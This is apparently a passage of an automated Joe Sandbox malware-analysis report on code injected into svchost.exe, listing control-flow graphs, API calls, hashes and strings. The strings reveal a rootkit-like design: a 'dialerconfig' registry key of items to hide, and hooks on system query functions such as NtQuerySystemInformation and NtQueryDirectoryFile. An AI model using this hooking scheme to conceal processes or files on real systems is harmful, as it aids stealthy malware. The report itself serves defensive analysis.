2a6613010c7 RegEnumValueW 14093->14095 14094 2a661301149 GetProcessHeap HeapAlloc 14094->14095 14095->14092 14095->14093 14095->14094 14096 2a66130117f GetProcessHeap HeapFree 14095->14096 14096->14095 14098 2a6613015a4 14097->14098 14101 2a66130156e 14097->14101 14098->14086 14099 2a66130158d StrCmpW 14099->14101 14100 2a661301585 StrCmpIW 14100->14101 14101->14098 14101->14099 14101->14100 14102 2a6612d2908 14104 2a6612d2936 14102->14104 14103 2a6612d2a2b LoadLibraryA 14103->14104 14104->14103 14105 2a6612d2aa7 14104->14105

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                • String ID:
                                                • API String ID: 1683269324-0
                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction ID: d58425ed8a59d5428c8ef40dad0f60b78ff9bcff066837ae15f2104d75efcea5
                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction Fuzzy Hash: 18115B74F106018BFB22D721A84FB6A32DCA756F46F4D00259A0BBB594EF3DC04C8282

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 000002A661301650: GetProcessHeap.KERNEL32 ref: 000002A66130165B
                                                  • Part of subcall function 000002A661301650: HeapAlloc.KERNEL32 ref: 000002A66130166A
                                                  • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016DA
                                                  • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A661301707
                                                  • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A661301721
                                                  • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A661301741
                                                  • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A66130175C
                                                  • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A66130177C
                                                  • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A661301797
                                                  • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017B7
                                                  • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A6613017D2
                                                  • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017F2
                                                • Sleep.KERNEL32 ref: 000002A661301C43
                                                • SleepEx.KERNEL32 ref: 000002A661301C49
                                                  • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A66130180D
                                                  • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A66130182D
                                                  • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A661301848
                                                  • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A661301868
                                                  • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A661301883
                                                  • Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A6613018A3
                                                  • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A6613018BE
                                                  • Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A6613018C8
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                • String ID:
                                                • API String ID: 1534210851-0
                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction ID: 00c3e32f535f1a666752326b103c4686352be0cf57cb2c7f26f20961d7c6380f
                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction Fuzzy Hash: FB31F075B0060193FB51AF26E94D36A62FDAB46FDAF0C4021DE0BA76D5DF1CC45882D2

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 57 2a661303930-2a66130393b 58 2a66130393d-2a661303950 StrCmpNIW 57->58 59 2a661303955-2a66130395c 57->59 58->59 60 2a661303952 58->60 60->59
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: dialer
                                                • API String ID: 0-3528709123
                                                • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                • Instruction ID: 7fe97d79589782e628872070bc3fa000d6e2a9929ce407a7fd10b9c94f4c1939
                                                • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                • Instruction Fuzzy Hash: B5D05E20B1124A8BEB14DFA1888E76033A8AB06B15F4C80208A0213114DF1C898DC711

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2938691158.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a6612d0000_svchost.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: bfb7080cd5f30ec63c7e1aa02e3938f4a0833d0643ea63299f78d611e02fc58c
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: FD61FDA2F0165187EA68CF29D44876CB39DFF06FA4F588021DA1907785EF3CE896C706

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 207 2a661302cdc-2a661302d55 call 2a66131ecc0 210 2a661302d5b-2a661302d61 207->210 211 2a661303090-2a6613030b3 207->211 210->211 212 2a661302d67-2a661302d6a 210->212 212->211 213 2a661302d70-2a661302d73 212->213 213->211 214 2a661302d79-2a661302d89 GetModuleHandleA 213->214 215 2a661302d8b-2a661302d9b call 2a661313090 214->215 216 2a661302d9d 214->216 217 2a661302da0-2a661302dbe 215->217 216->217 217->211 221 2a661302dc4-2a661302de3 StrCmpNIW 217->221 221->211 222 2a661302de9-2a661302ded 221->222 222->211 223 2a661302df3-2a661302dfd 222->223 223->211 224 2a661302e03-2a661302e0a 223->224 224->211 225 2a661302e10-2a661302e23 224->225 226 2a661302e33 225->226 227 2a661302e25-2a661302e31 225->227 228 2a661302e36-2a661302e3a 226->228 227->228 229 2a661302e4a 228->229 230 2a661302e3c-2a661302e48 228->230 231 2a661302e4d-2a661302e57 229->231 230->231 232 2a661302f4d-2a661302f51 231->232 233 2a661302e5d-2a661302e60 231->233 236 2a661302f57-2a661302f5a 232->236 237 2a661303082-2a66130308a 232->237 234 2a661302e72-2a661302e7c 233->234 235 2a661302e62-2a661302e6f call 2a661301a14 233->235 239 2a661302e7e-2a661302e8b 234->239 240 2a661302eb0-2a661302eba 234->240 235->234 241 2a661302f6b-2a661302f75 236->241 242 2a661302f5c-2a661302f68 call 2a661301a14 236->242 237->211 237->225 239->240 246 2a661302e8d-2a661302e9a 239->246 247 2a661302eea-2a661302eed 240->247 248 2a661302ebc-2a661302ec9 240->248 243 2a661302f77-2a661302f84 241->243 244 2a661302fa5-2a661302fa8 241->244 242->241 243->244 250 2a661302f86-2a661302f93 243->250 251 2a661302faa-2a661302fb3 call 2a661301d28 244->251 252 2a661302fb5-2a661302fc2 lstrlenW 244->252 253 2a661302e9d-2a661302ea3 246->253 255 2a661302efb-2a661302f08 lstrlenW 247->255 256 2a661302eef-2a661302ef9 call 2a661301d28 247->256 248->247 254 2a661302ecb-2a661302ed8 248->254 258 2a661302f96-2a661302f9c 250->258 251->252 269 2a661302ffa-2a661303005 251->269 264 2a661302fc4-2a661302fce 252->264 265 2a661302fe5-2a661302fef call 2a661303930 252->265 262 2a661302ea9-2a661302eae 253->262 263 2a661302f43-2a661302f48 253->263 266 2a661302edb-2a661302ee1 254->266 259 2a661302f0a-2a661302f14 255->259 260 2a661302f2b-2a661302f3d call 2a661303930 255->260 256->255 256->263 258->269 270 2a661302f9e-2a661302fa3 258->270 259->260 271 2a661302f16-2a661302f29 call 2a661301554 259->271 260->263 274 2a661302ff2-2a661302ff4 260->274 262->240 262->253 263->274 264->265 275 2a661302fd0-2a661302fe3 call 2a661301554 264->275 265->274 266->263 276 2a661302ee3-2a661302ee8 266->276 278 2a661303007-2a66130300b 269->278 279 2a66130307c-2a661303080 269->279 270->244 270->258 271->260 271->263 274->237 274->269 275->265 275->269 276->247 276->266 284 2a66130300d-2a661303011 278->284 285 2a661303013-2a66130302d call 2a6613086a0 278->285 279->237 284->285 288 2a661303030-2a661303033 284->288 285->288 291 2a661303056-2a661303059 288->291 292 2a661303035-2a661303053 call 2a6613086a0 288->292 291->279 294 2a66130305b-2a661303079 call 2a6613086a0 291->294 292->291 294->279
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: 23cd8f04e71538b5eb9847158c47a201b9a4386d364ecdc48b455eb11579518a
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: B2B18D22B11A5087EB55CF25D54C7A963E8FB46F86F58501AEE0B63B94DF39CC88C381

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: a5cba665a44c7c07cf1dccde805d8f3e79610c362df98632861a869d0ed45d4e
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: 1F315D72705B8096EB60DF60E8483ED73A8F785B54F48442ADA8E57B98EF38C54CC710
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction ID: d8417c2ec523aaff61b500a3c85146917342d7b6945cdc37d9ed16cda4c36ab7
                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction Fuzzy Hash: 29319136704F8086DB20CF25E84939E73A8F78ABA4F580116EA9E57B58DF3CC549CB40
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: 4b748053efe2aa4dd715676edb3458f9a06d083db582eb8aa2e1b11a5c0e5f8f
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: D0E1E032B04A808BE700CF64D48D2DE7BB5F346B98F584516DE4AA7B99DF38C42AC741

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: 500288821ed10b0b1a9fdc2d981699a51519602a79c13b7e50a4a9ec7bc15a24
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: 2971F576B10A5086EB10DF65E88D69937F8FB8AF9DF081121DA4F67A28DF38C549C341

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: df57f9b9fcc86950589ce138aa7a0377636607729903278f6d4bc0027d70b6ca
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: F9515972B14B4493EB14DB62E54D39AB7B9F78AF94F088124DA8A17B24DF3CC059C741

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: e83984e6cd47dee7b92e0930eaa5e7c94e4c88081b7f63715ee1e9d06479c404
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: C231C569B00A4AA3FA09EB65ED5E6D53379A746F46F8C5423D40B335719F3C828DC382

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: 132fcfba970474944b12d8b7567ee438171c688ab5bdda6d84782a329f9c713f
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: D8213C36B14A4083FB10CB25E54D35A77A4F38AFA5F584215EA5A13AA8CF3CC14DCB42

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: 5125639fb1c4ff0c7cbb5d2a65fe4d13d97550c52107701ede0c85e5c89c4d54
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: 94419173614B8097E764CF51E44839AB7B5F389B99F048125DB8A17B54DF3CC168CB40

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 429 2a6613075f0-2a6613075f6 430 2a6613075f8-2a6613075fb 429->430 431 2a661307631-2a66130763b 429->431 432 2a6613075fd-2a661307600 430->432 433 2a661307625-2a661307664 call 2a661307ca0 430->433 434 2a661307758-2a66130776d 431->434 435 2a661307618 __scrt_dllmain_crt_thread_attach 432->435 436 2a661307602-2a661307605 432->436 452 2a66130766a-2a66130767f call 2a661307b34 433->452 453 2a661307732 433->453 437 2a66130777c-2a661307796 call 2a661307b34 434->437 438 2a66130776f 434->438 444 2a66130761d-2a661307624 435->444 440 2a661307607-2a661307610 436->440 441 2a661307611-2a661307616 call 2a661307be4 436->441 450 2a661307798-2a6613077cd call 2a661307c5c call 2a661307afc call 2a661307ff8 call 2a661307e10 call 2a661307e34 call 2a661307c8c 437->450 451 2a6613077cf-2a661307800 call 2a661307e70 437->451 442 2a661307771-2a66130777b 438->442 441->444 450->442 463 2a661307811-2a661307817 451->463 464 2a661307802-2a661307808 451->464 461 2a66130774a-2a661307757 call 2a661307e70 452->461 462 2a661307685-2a661307696 call 2a661307ba4 452->462 456 2a661307734-2a661307749 453->456 461->434 479 2a6613076e7-2a6613076f1 call 2a661307e10 462->479 480 2a661307698-2a6613076bc call 2a661307fbc call 2a661307aec call 2a661307b18 call 2a661309cdc 462->480 468 2a661307819-2a661307823 463->468 469 2a66130785e-2a661307874 call 2a661303458 463->469 464->463 467 2a66130780a-2a66130780c 464->467 475 2a6613078ff-2a66130790c 467->475 476 2a66130782f-2a66130783d call 2a661313358 468->476 477 2a661307825-2a66130782d 468->477 488 2a661307876-2a661307878 469->488 489 2a6613078ac-2a6613078ae 469->489 482 2a661307843-2a661307858 call 2a6613075f0 476->482 498 2a6613078f5-2a6613078fd 476->498 477->482 479->453 502 2a6613076f3-2a6613076ff call 2a661307e60 479->502 480->479 532 2a6613076be-2a6613076c5 __scrt_dllmain_after_initialize_c 480->532 482->469 482->498 488->489 495 2a66130787a-2a66130789c call 2a661303458 call 2a661307758 488->495 496 2a6613078b0-2a6613078b3 489->496 497 2a6613078b5-2a6613078ca call 2a6613075f0 489->497 495->489 526 2a66130789e-2a6613078a6 call 2a661313358 495->526 496->497 496->498 497->498 511 2a6613078cc-2a6613078d6 497->511 498->475 519 2a661307701-2a66130770b call 2a661307d78 502->519 520 2a661307725-2a661307730 502->520 516 2a6613078d8-2a6613078df 511->516 517 2a6613078e1-2a6613078f1 call 2a661313358 511->517 516->498 517->498 519->520 531 2a66130770d-2a66130771b 519->531 520->456 526->489 531->520 532->479 533 2a6613076c7-2a6613076e4 call 2a661309c78 532->533 533->479
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 7ddb7ff4f809c3db95e285fe4209e61c8d899d6b3a3ce55c37dc94c9d2a4d2eb
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 8181E021F0064587FA50EB29984E3A926DCAB47F92F0C44159A8B77792DF3CC94EC792

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 322 2a6612d69f0-2a6612d69f6 323 2a6612d6a31-2a6612d6a3b 322->323 324 2a6612d69f8-2a6612d69fb 322->324 325 2a6612d6b58-2a6612d6b6d 323->325 326 2a6612d6a25-2a6612d6a64 call 2a6612d70a0 324->326 327 2a6612d69fd-2a6612d6a00 324->327 331 2a6612d6b6f 325->331 332 2a6612d6b7c-2a6612d6b96 call 2a6612d6f34 325->332 345 2a6612d6b32 326->345 346 2a6612d6a6a-2a6612d6a7f call 2a6612d6f34 326->346 329 2a6612d6a02-2a6612d6a05 327->329 330 2a6612d6a18 __scrt_dllmain_crt_thread_attach 327->330 336 2a6612d6a11-2a6612d6a16 call 2a6612d6fe4 329->336 337 2a6612d6a07-2a6612d6a10 329->337 334 2a6612d6a1d-2a6612d6a24 330->334 338 2a6612d6b71-2a6612d6b7b 331->338 343 2a6612d6bcf-2a6612d6c00 call 2a6612d7270 332->343 344 2a6612d6b98-2a6612d6bcd call 2a6612d705c call 2a6612d6efc call 2a6612d73f8 call 2a6612d7210 call 2a6612d7234 call 2a6612d708c 332->344 336->334 354 2a6612d6c02-2a6612d6c08 343->354 355 2a6612d6c11-2a6612d6c17 343->355 344->338 349 2a6612d6b34-2a6612d6b49 345->349 357 2a6612d6a85-2a6612d6a96 call 2a6612d6fa4 346->357 358 2a6612d6b4a-2a6612d6b57 call 2a6612d7270 346->358 354->355 359 2a6612d6c0a-2a6612d6c0c 354->359 360 2a6612d6c5e-2a6612d6c74 call 2a6612d2858 355->360 361 2a6612d6c19-2a6612d6c23 355->361 375 2a6612d6ae7-2a6612d6af1 call 2a6612d7210 357->375 376 2a6612d6a98-2a6612d6abc call 2a6612d73bc call 2a6612d6eec call 2a6612d6f18 call 2a6612d90dc 357->376 358->325 365 2a6612d6cff-2a6612d6d0c 359->365 378 2a6612d6cac-2a6612d6cae 360->378 379 2a6612d6c76-2a6612d6c78 360->379 366 2a6612d6c25-2a6612d6c2d 361->366 367 2a6612d6c2f-2a6612d6c3d call 2a6612e2758 361->367 372 2a6612d6c43-2a6612d6c58 call 2a6612d69f0 366->372 367->372 389 2a6612d6cf5-2a6612d6cfd 367->389 372->360 372->389 375->345 398 2a6612d6af3-2a6612d6aff call 2a6612d7260 375->398 376->375 425 2a6612d6abe-2a6612d6ac5 __scrt_dllmain_after_initialize_c 376->425 387 2a6612d6cb5-2a6612d6cca call 2a6612d69f0 378->387 388 2a6612d6cb0-2a6612d6cb3 378->388 379->378 386 2a6612d6c7a-2a6612d6c9c call 2a6612d2858 call 2a6612d6b58 379->386 386->378 419 2a6612d6c9e-2a6612d6ca6 call 2a6612e2758 386->419 387->389 407 2a6612d6ccc-2a6612d6cd6 387->407 388->387 388->389 389->365 409 2a6612d6b25-2a6612d6b30 398->409 410 2a6612d6b01-2a6612d6b0b call 2a6612d7178 398->410 413 2a6612d6ce1-2a6612d6cf1 call 2a6612e2758 407->413 414 2a6612d6cd8-2a6612d6cdf 407->414 409->349 410->409 424 2a6612d6b0d-2a6612d6b1b 410->424 413->389 414->389 419->378 424->409 425->375 426 2a6612d6ac7-2a6612d6ae4 call 2a6612d9078 425->426 426->375
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2938691158.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a6612d0000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: fbc1adb9c41e37bcc120c75772abb7ef734b56d2905b7fa5b335fbd78ce71589
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: AC818961F006C18BFA64AB66D48D399769CAF87F80F4C8025EA4943696DF3CC9CD8302

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 536 2a661309804-2a661309842 537 2a661309848-2a66130984b 536->537 538 2a661309933 536->538 539 2a661309851 537->539 540 2a661309935-2a661309951 537->540 538->540 541 2a661309854 539->541 542 2a66130985a-2a661309869 541->542 543 2a66130992b 541->543 544 2a661309876-2a661309895 LoadLibraryExW 542->544 545 2a66130986b-2a66130986e 542->545 543->538 548 2a661309897-2a6613098a0 call 2a661313080 544->548 549 2a6613098ed-2a661309902 544->549 546 2a66130990d-2a66130991c call 2a661313090 545->546 547 2a661309874 545->547 546->543 558 2a66130991e-2a661309929 546->558 552 2a6613098e1-2a6613098e8 547->552 556 2a6613098cf-2a6613098d9 548->556 557 2a6613098a2-2a6613098b7 call 2a66130ad28 548->557 549->546 550 2a661309904-2a661309907 FreeLibrary 549->550 550->546 552->541 556->552 557->556 561 2a6613098b9-2a6613098cd LoadLibraryExW 557->561 558->540 561->549 561->556
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: 9bd910482f45c5d8184c8c718260f1b040edf69a8f8e68ff72a2fb9d4db38604
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: 21318F31B12A5196EE11DF02A80C79967D8BB4AFA1F1E4525ED2F6B390DF3CC54D8342

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: ead090be0ed3a0cdea6c2fc4ee05aebdc710564f3f58afb868419e84163d7b64
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: 03118B31B14B5087E7508B52E84E31972B8F39AFE4F084224EA5B97798CF3CC9088741
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
